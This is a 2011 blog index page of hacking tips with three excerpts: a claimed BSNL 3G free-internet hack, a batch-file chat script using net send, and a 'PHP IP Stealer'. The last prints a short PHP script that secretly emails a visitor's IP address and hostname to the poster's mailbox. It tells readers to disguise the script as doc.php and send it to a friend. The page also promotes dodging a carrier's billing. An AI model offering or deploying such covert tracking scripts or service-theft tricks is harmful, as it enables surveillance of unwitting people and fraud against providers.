Thursday, July 28, 2011

BSNL 3G Hack! Browse Internet For Free

Today I am going to show how to hack BSNL 3G hack and browse unlimited internet at high speed up to 120 Kbps. I am not sure whether this hacking is still working or not, members from other forums are posting that this hack is working fine for them. Before you start learning how to hack you need to have BSNL 2G SIM and ultimately 3G support mobile...

Monday, July 18, 2011

Chat With Command Prompt

If you want a private chat with a friend or client on you Network, you don't need to download any fancy program! All you need is your friends IP address and Command Prompt. Firstly, open Notepad and enter: @echo off :A Cls echo MESSENGER set /p n=User: set /p m=Message: net send %n% %m% Pause Goto A Now save this as "Messenger.bat". Open the .bat file and in Command Prompt you should see: MESSENGER User: After "User" type the IP address of the computer you want to contact. After this, you should see this: Message: Now type in the message you...

Friday, July 15, 2011

PHP IP Stealer

$ip = $REMOTE_ADDR; $host = gethostbyaddr($ip); $date = date("d/m/Y H:i:s"); $email = "dushpandya2001@hotmail.com"; $sujet = "Ip + Host"; $message = " Ip : $ip Host : $host"; if(mail($email,$sujet,$message,"Content-Type: text/html")){ echo "Ownneeed";} else { echo "Shit ?";} ?> Replace dushpandya2001@hotmail.com with your addres mail make a doc.php give him to your friend and you will recive his ip and host in your inbo...

Page 1 of 812345Next
Twitter Delicious Facebook Digg Stumbleupon Favorites More